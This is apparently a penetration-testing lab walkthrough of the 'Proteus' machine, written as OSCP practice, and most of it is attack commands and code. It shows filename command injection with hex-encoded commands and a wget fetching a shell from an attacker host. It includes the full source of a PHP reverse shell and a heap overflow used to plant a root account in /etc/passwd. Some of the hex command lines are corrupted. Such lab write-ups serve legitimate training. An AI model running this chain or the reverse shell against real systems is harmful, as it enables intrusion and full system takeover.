Proteus Walkthrough

OSCP Preparation

Issue with Virtual Box, hence used VMware Player

netdiscover -r 192.168.43.0/24

nmap 192.168.43.27

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
5355	llmnr

sparta 192.168.43.27

http://192.168.43.27/

Invalid MIME type

C Program upload

Strings
objdump

/home/malwareadm/samples/597751680cd62.: file format elf64-x86-64

...
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------5317954218929153651063741294
Content-Length: 8870

-----------------------------5317954218929153651063741294
Content-Disposition: form-data; name="file"; filename="sample.elf; id; "
Content-Type: application/octet-stream
...

...

-----------------------------5317954218929153651063741294
Content-Disposition: form-data; name="file"; filename="sample.elf; pwd;"
Content-Type: application/octet-stream
...

xxd ==> hex code decode

cat /etc/passwd in burp ==> 636174202F6574632F706173737764

.elf; `echo 636174202F6574632F706173737764 | xxd -r -p`

Let's get the shell.

cp /usr/share/webshells/php/php-reverse-shell.php /root/Desktop/proteus/

cp /root/Desktop/proteus/shell.php /var/www/html/

IP: 192.68.43.95
Port: 4444

wget http://192.168.43.95/shell.php -O /tmp/shell.php

wget http://192.168.43.95/shell.txt -O /tmp/shell.php

.elf; `echo 7767657420687474703a2f2f3139322e3136382e34332e39352f7368656c6c2e747874202d4f202f746d702f7368656c6c2e706870 | xxd -r -p`

rm -rf /tmp/shell.php

.elf; `726d202d7266202f746d702f7368656c16c2e706870 |xxd -r -p`

ls -alh /tmp

.elf; `echo 6c73202d616c68202f746d70 | xxd -r -p`

cat /tmp/shell.php

.elf; `echo 636174202f746d702f7368656c6c2e706870 | xxd -r -p`	

.elf; `echo  | xxd -r -p`

chmod 777 /tmp/shell.php

.elf; `63686d6f6420373737202f746d702f7368656c6c2e706870 | xxd -r -p`

php /tmp/shell.php

.elf; `echo 706870202f746d702f7368656c6c2e706870 | xxd -r -p`

got shell

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

whoami
www-data

python -c 'import pty; pty.spawn("/bin/bash")'

cd /home/malwareadm/sites/proteus_site

ls

PROTEUS_INSTALL  admin_login_logger  admin_login_request.js  db  web

cat PROTEUS_INSTALL

./admin_login_logger
./admin_login_logger
Usage: ./admin_login_logger  ADMIN LOGIN ATTEMPT (This will be done with phantomjs) 

./admin_login_logger gullu
<areadm/sites/proteus_site$ ./admin_login_logger gullu                       
Writing datafile 0x94c81d0: '/var/log/proteus/log'

https://github.com/Svenito/exploit-pattern

pattern.py

python pattern.py 500

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7
Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5
Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3
Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1
Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9
Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq

./admin_login_logger 'hello'
<areadm/sites/proteus_site$ ./admin_login_logger 'hello'                     
Writing datafile 0x82511d0: '/var/log/proteus/log'

./admin_login_logger 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq'

<o8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq'                    
Writing datafile 0x82931d0: 'Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0A	'
*** Error in `./admin_login_logger': double free or corruption (!prev): 0x08293008 ***
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(+0x67f0a)[0xb7606f0a]
/lib/i386-linux-gnu/libc.so.6(+0x6eb07)[0xb760db07]
/lib/i386-linux-gnu/libc.so.6(+0x6f3c6)[0xb760e3c6]
./admin_login_logger[0x8048a14]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb75b7276]
./admin_login_logger[0x80485d1]
======= Memory map: ========
...
...
...

Log position (/var/log/proteus/log is now Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0A	) has changed. This we can use to write our exploit.

python pattern.py Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0A

Pattern Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0A first occurrence at position 456 in pattern.

Privilege escalation exploits were not successful.

So, we can now try and add a user in /etc/passwd with root privileges.

https://ma.ttias.be/how-to-generate-a-passwd-password-hash-via-the-command-line-on-linux/

We can follow thhis tutorial to create a hash for /etc/shadow

openssl passwd -1 -salt abc test

$1$abc$B..HicC/afMveWeNyfNsf/

Format this as password entry.

hacked:$1$abc$B..HicC/afMveWeNyfNsf/:0:0::/tmp/

python

len('hacked:$1$abc$B..HicC/afMveWeNyfNsf/:0:0::/tmp/')
47
456-47=409

python pattern.py 409
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5A

Exploit becomes:

./admin_login_logger 'hacked:$1$abc$B..HicC/afMveWeNyfNsf/:0:0::/tmp/Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5A/etc/passwd'

su hacked
test

cd /root
ls

scp flag.png [email protected]:/root/Desktop
....

pattern.py

#!/usr/bin/env python3

import sys
from string import ascii_uppercase, ascii_lowercase, digits

MAX_PATTERN_LENGTH = 20280

class MaxLengthException(Exception):
    pass

class WasNotFoundException(Exception):
    pass


def pattern_gen(length):
    """
    Generate a pattern of a given length up to a maximum
    of 20280 - after this the pattern would repeat
    """
    if length >= MAX_PATTERN_LENGTH:
        raise MaxLengthException('ERROR: Pattern length exceeds maximum of %d' % MAX_PATTERN_LENGTH)

    pattern = ''
    for upper in ascii_uppercase:
        for lower in ascii_lowercase:
            for digit in digits:
                if len(pattern) < length:
                    pattern += upper+lower+digit
                else:
                    out = pattern[:length]
                    return out


def pattern_search(search_pattern):
    """
    Search for search_pattern in pattern.  Convert from hex if needed
    Looking for needle in haystack
    """
    needle = search_pattern

    try:
        if needle.startswith('0x'):
            # Strip off '0x', convert to ASCII and reverse
            needle = needle[2:]
            needle = bytes.fromhex(needle).decode('ascii')
            needle = needle[::-1]
    except TypeError as e:
        print('Unable to convert hex input:', e)
        sys.exit(1)
        #e.args(e.args[0] + 'Unable to convert to hex input') 
        #raise

    haystack = ''
    for upper in ascii_uppercase:
        for lower in ascii_lowercase:
            for digit in digits:
                haystack += upper+lower+digit
                found_at = haystack.find(needle)
                if found_at > -1:
                    return found_at

    raise WasNotFoundException('Couldn`t find %s (%s) anywhere in the pattern.' %
          (search_pattern, needle))


def print_help():
    print('Usage: %s LENGTH|PATTERN' % sys.argv[0])
    print()
    print('Generate a pattern of length LENGTH or search for PATTERN and ')
    print('return its position in the pattern.')
    print()
    sys.exit(0)


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print_help()

    if sys.argv[1].isdigit():
        pat = pattern_gen(int(sys.argv[1]))
        print(pat)
    else:
        found = pattern_search(sys.argv[1])
        print('Pattern %s first occurrence at position %d in pattern.' %
              (sys.argv[1], found))

php_reverse_shell.php

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 [email protected]
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at [email protected]
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.43.95';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}

	// Make the current process a session leader
	// Will only succeed if we forked
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	// Check for end of TCP connection
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	// Check for end of STDOUT
	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	// Wait until a command is end down $sock, or some
	// command output is available on STDOUT or STDERR
	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	// If we can read from the TCP socket, send
	// data to process's STDIN
	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	// If we can read from the process's STDOUT
	// send data down tcp connection
	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	// If we can read from the process's STDERR
	// send data down tcp connection
	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}

?> 

test.c

#include <stdio.h>

int main()
{
	printf("Hello Word!!!");
	printf("Testing");
	return 0;
}